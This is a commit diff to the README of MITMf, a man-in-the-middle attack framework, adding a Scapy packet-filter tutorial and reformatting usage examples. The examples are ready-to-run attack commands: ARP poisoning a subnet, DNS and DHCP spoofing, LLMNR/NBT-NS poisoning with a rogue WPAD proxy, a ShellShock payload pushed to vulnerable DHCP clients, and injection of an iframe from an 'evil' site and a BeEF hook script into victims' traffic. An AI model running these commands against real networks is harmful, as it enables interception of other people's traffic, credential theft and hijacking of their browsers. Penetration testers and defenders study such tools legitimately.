added packet filter tutorial to README

README.md

@@ -16,7 +16,7 @@ Contact me at:
 - IRC on Freenode: #MITMf
 - Email: byt3bl33d3r@gmail.com
 
-**Before submitting issues, please read the [FAQ](#faq) and [CONTRIBUTING.md](CONTRIBUTING.md).**
+**Before submitting issues, please read the [CONTRIBUTING.md](CONTRIBUTING.md).**
 
 Description
 ============
@@ -40,46 +40,67 @@ allowing users to modify any type of traffic or protocol.
 
 - [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
 
+Active packet filtering/modification
+====================================
+
+You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
+
+For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
+
+```
+if packet.haslayer(ICMP):
+	packet.dst = '192.168.1.0'
+
+```
+- Use the ```packet``` variable to access the packet in a Scapy compatible format
+- Use the ```data``` variable to access the raw packet data
+
+Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
+
+You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
+
 Examples
 ========
 
 The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
 
-- ```python mitmf.py -i enp3s0```
+```python mitmf.py -i enp3s0```
 
 ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin:
 
-- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
+```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
 
 Same as above + a WPAD rogue proxy server using the **Responder** plugin:
 
-- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
+```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
 
 Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
 
-- ```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
+```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
 
 Enable LLMNR/NBTNS/MDNS spoofing:
 
-- ```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
+```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
 
 Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
 
-- ```python mitmf.py -i enp3s0 --spoof --dhcp```
+```python mitmf.py -i enp3s0 --spoof --dhcp```
 
 Same as above with a ShellShock payload that will be executed if any client is vulnerable:
 
-- ```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
+```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
 
 Inject an HTML IFrame using the **Inject** plugin:
 
-- ```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
+```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
 
 Inject a JS script:
 
-- ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
+```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
 
-And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
+And much much more! 
+
+Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
 
 For a complete list of available options, just run ```python mitmf.py --help```